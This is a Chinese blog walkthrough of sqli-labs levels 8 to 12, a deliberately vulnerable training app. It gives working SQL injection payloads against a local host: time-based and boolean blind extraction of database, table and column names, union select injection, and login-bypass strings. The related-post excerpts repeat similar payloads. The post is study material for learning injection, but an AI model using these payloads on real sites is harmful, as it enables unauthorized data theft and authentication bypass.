LESS-8 ~LESS-12

最新推荐文章于 2024-05-21 19:05:10 发布
最新推荐文章于 2024-05-21 19:05:10 发布
阅读量532 收藏
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44598397/article/details/88700518
版权

LESS-8

此处不同于第5关的是:这里的报错被注释掉了,故不能用报错注入,可以延时注入和布尔注入
在这里插入图片描述
延时注入:
http://127.0.0.1/sqlilabs/Less-8/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+在这里插入图片描述
盲注:
http://127.0.0.1/sqlilabs/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))%3E80–+在这里插入图片描述

LESS-9在这里插入图片描述
方法和8相同:
1、进行延时注入:
http://127.0.0.1/sqlilabs/Less-9/?id=1' and if (ascii(substr(database(),1,1))=115,1,sleep(5))–+ (同时说明数据库名的第一个元素为s)
在这里插入图片描述扩展:
http://127.0.0.1/sqlilabs/Less-8/?id=1' and if (ascii(substr(database(),2,1))=101,1,sleep(5))–+ (由此可以猜测出数据库名的第二个字母为e,由此方法推测出后面的字母)

http://127.0.0.1/sqlilabs/Less-9/?id=1' and if(ascii(substr((select table_name from information schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))–+ (由此猜测数据库下的第一个数据表名的第一个字母为e)在这里插入图片描述拓展:
http://127.0.0.1/sqlilabs/Less-9/?id=1' and if(ascii(substr((select table_name from information schema.tables where table_schema='security' limit 1,1),1,1))=101,1,sleep(5))–+ (由此猜测数据库下的第二个数据表名的第一个字母为r)

猜测user表下的第一个列名的值为i:
127.0.0.1/sqlilabs/Less-9/?id=1%27 and if(ascii(substr((select column_name from information schema.columns where table_name=%27user%27 limit 0,1),1,1))=105,1,sleep(5))–+
在这里插入图片描述

猜测user表下username列的值:
http://127.0.0.1/sqlilabs/Less-9/?id=1' and if(ascii(substr((select column_name from information schema.columns where table_name='user' limit 0,1),1,1))=105,1,sleep(5))–+在这里插入图片描述

LESS-10
在这里插入图片描述
这里类比LESS-9(把单引号改为双引号即可)
http://127.0.0.1/sqlilabs/Less-10/?id=1" and if (ascii(substr(database(),1,1))=115,1,sleep(5))–+在这里插入图片描述
LESS-11
源码:
在这里插入图片描述
Username输入:admin’,password随便输入
在这里插入图片描述
出现错误提示‘bbb’limit 0,1’ 因为多加的一个单引号,和密码前的单引号成对密闭。二错提示去掉一个单引号后还多了一个单引号(因为密码前的一个单引号和前面用户名的单引号配套,因此密码处的一个单引号落单)。说明他是有单引号闭合的。

当我们提交 username 和 password 后,后台形成的 sql 语句为
@KaTeX parse error: Expected 'EOF', got '#' at position 73: …'admin'or'1'='1#̲ and password='passwd’ LIMIT 0,1";
在#以后的内容就被注释掉,所以语句就成立,我们此时以admin 的用户登录。在这里插入图片描述在这里插入图片描述在这里插入图片描述
用户名为admin的用户名本来对应得密码就是admin

这里我们用 union 注入进行尝试:
Username:1admin’union select 1,database()#
passwd=1(任意密码)在这里插入图片描述
LESS-12
在这里插入图片描述
输入admin”后在这里插入图片描述
从错误提示可以看出这是以双引号和括号闭合的方式。

输入:用户名admin”)#在这里插入图片描述
这里注意用 admin”)or 1=1#方式登录的话,居然是 Dumb 登录,这里解释一下为什么不是
admin 登录。其实是因为 sql 执行的优先级的问题在这里插入图片描述

林夕林@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs靶场Less-8
songling515010475的专栏
08-23 219
1、访问首页,/Less-8/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 分析:这里是单引号闭合,且这里输错SQL语句没有报错和提示,只是不展示数据而己。哪么这里能用到的方式与第7关一样, 2、判断字段数量 http://192.168.60.142:8080/sqlilabs/Less-8/index.php?id=1 ' order b..
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
Less-8(盲注--布尔盲注)
老司机开代码的博客
08-03 1148
文章目录布尔盲注1. 关卡分析2. 盲注思路3. 编写工具进行通关 布尔盲注 在前面的练习中,也涉及到了布尔盲注的解题过程,思路都是一样的。自己构造判断语句强制页面进行判断并根据返回结果查看判断的正确性。 1. 关卡分析 本次的关卡是less-8,首先我们来分析一下这个页面。通过多次的尝试我们发现,如果输入的是true,那么就会返回一个You are in......,而如果是false,则不会返...
sql注入less8——布尔盲注
最新发布
m0_62903168的博客
05-21 312
可这个效率依旧太差了,因为代码中有两个for循环,大大增加了查询时间,因此我们用二分查找来增加脚本效率。查询语句:id=1' and substr(database(),1,1) = 's' --+查询语句:id=1' and substr(database(),1,1) = 'a' --+因为这样一次一次的去输入,去判断,所需时间确实太久了,所以用脚本来实现是最好的。
Less-8 【布尔盲注】
tubug的博客
05-20 468
由上可知我们利用单引号想它发报错然后显示我们想要的信息,但是它并不会显示报错的信息,只显示一个错误的页面。这时候我们尝试利用异常报错的方式来查看是否会显示我们想要的信息。发现它异常报错不会抛出异常错误信息,利用单引号也无法让它显示报错信息,这时候我们就可以利用布尔盲注的方式进行猜解。布尔盲注:我们测试一个字符利用网址对或错的回显,来判断它的内容信息。以此类推比对各种ascii码,我们可知当前数据库所有表的名称为。以此类推比对各种ascii码,我们可知当前数据库的名称为。盲:就是什么都没有,类似盲人。
less1-less8
qq_36567469的博客
03-15 459
less1(备注:--+可以用#替代,因为是在url中,所以#要用url模式%23) less2 less03
【SQLI-Lab】-Less8
xinyue9966的博客
01-26 348
Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 和第7题思路过程一样,不过不需要写入、闭合字段后,开始用burp suite爆,具体过程不再细讲。 盲注爆库长度payload
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
less-plugin-lists:更少的ListArray操作
05-13
少插件列表 用于列表/数组操作的插件。...npm install -g less-plugin-lists 与lessc使用 lessc --lists file.less 有关通过命令行Less编译器使用插件的更多详细信息,请参见Less文档中的相应部分。
less-loader:编译不到CSS
04-29
首先,您需要安装less less-loader : $ npm install less less-loader --save-dev 然后将加载程序添加到您的webpack配置中。 例如: webpack.config.js module . exports = { module : { rules : [ { test ...
Webpack中css-loader和less-loader的使用教程
12-03
本文将详细介绍如何在Webpack配置中使用`css-loader`和`less-loader`。 ### 一、css-loader `css-loader`的主要功能是解析CSS文件,使其能够在JavaScript中被导入。通过`require`或`import`语句,你可以将CSS文件...
Sqli-labs之Less-8
→_→
03-30 1802
Less-8 GET-盲注-基于布尔值-单引号 根据题目提示可知这是单引号注入且需要通过盲注进行通关,那么首先利用单引号看一下网页的回显: 测试是否是注入点 发现什么也没有,也就是说网页不会返回任何报错信息,也不会返回其他信息即没有任何回显信息, Less1、5、7、8回显对比 ...
Less-8
weixin_30945039的博客
04-08 60
这关和第5关的区别不是很大,就是不能报错注入,后面我看了下源码,发现报错被注释了,所以只能用布尔型和时间型了。 我还是来演示一下,我随便用一个第5关的payload:' and 1=(if(substr(database(),1,1)>'a',1,0))%23 我们再试一下延时注入,payload:   ' and 1=(if(substr(database(),1,1)='t',1...
sqli-labs(less-8)
墨鱼菜鸡
09-10 291
目录 less-8(布尔盲注)手工 1.判断闭合方式 2.判断数据库个数 3.判断第一个数据库字符长度 4.根据ascii码判断每个库名的具体字符 5.判断security库中表的个数 6.判断security库里第一个表名的长度 7.判断security库里第一个表的第一个字符的ascii值 8.判断security.users表的...
Sqli-labs less 8
weixin_34347651的博客
08-11 341
Less-8 经过简单的测试,我们发现 'or 1=1--+返回正常,那么我们就基本知道应该怎么使用了,参考less5.这里简单的进行一个示例: http://127.0.0.1/sqllib/Less-8/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+ 这里用的延时注入,当然了我们使用布尔类型的注入...
SQLi-labs(Less-8)
weixin_41182861的博客
08-01 225
Less-8 GET - Blind - Boolian Based - Single Quotes 初步测试发现闭合传参的是单引号: http://192.168.12.129:83/Less-8/?id=1' %23 但是,构造SQL语句,后台执行后不返回到前端。在此印证了布尔盲注。即:在不知道数据库返回值的情况下对数据中的内容进行猜测。猜对了,返回正常页面(无执行信息返回);猜错了,返回错误页面。 所以,可以根据页面是否正常来确定猜测信息准确性。 通常,用于猜解的SQL函数有: sleep
sqli-labs(less8)
m0_68980215的博客
07-08 243
lesson8
【sqli-lab】less8 (条件式相应)
versus117的博客
06-23 116
尝试用下for与while两个循环。 import requests as r import re fuzzing = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "."] pattern = "you are in" sqlversion = "" for k in range(1, 10): for i in range(len(fuzzing)): url = "http://10.10.10.138:10000/Le
sqli-labs-less-8
09-27
sqli-labs-less-8是一个用于学习SQL注入的实验题目。在这个实验中,通过在GET请求中使用闭合单引号和布尔值来进行盲注攻击。具体的步骤如下: 1. 在URL中输入id参数,并在参数值后添加闭合单引号,例如?id=1' 2. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值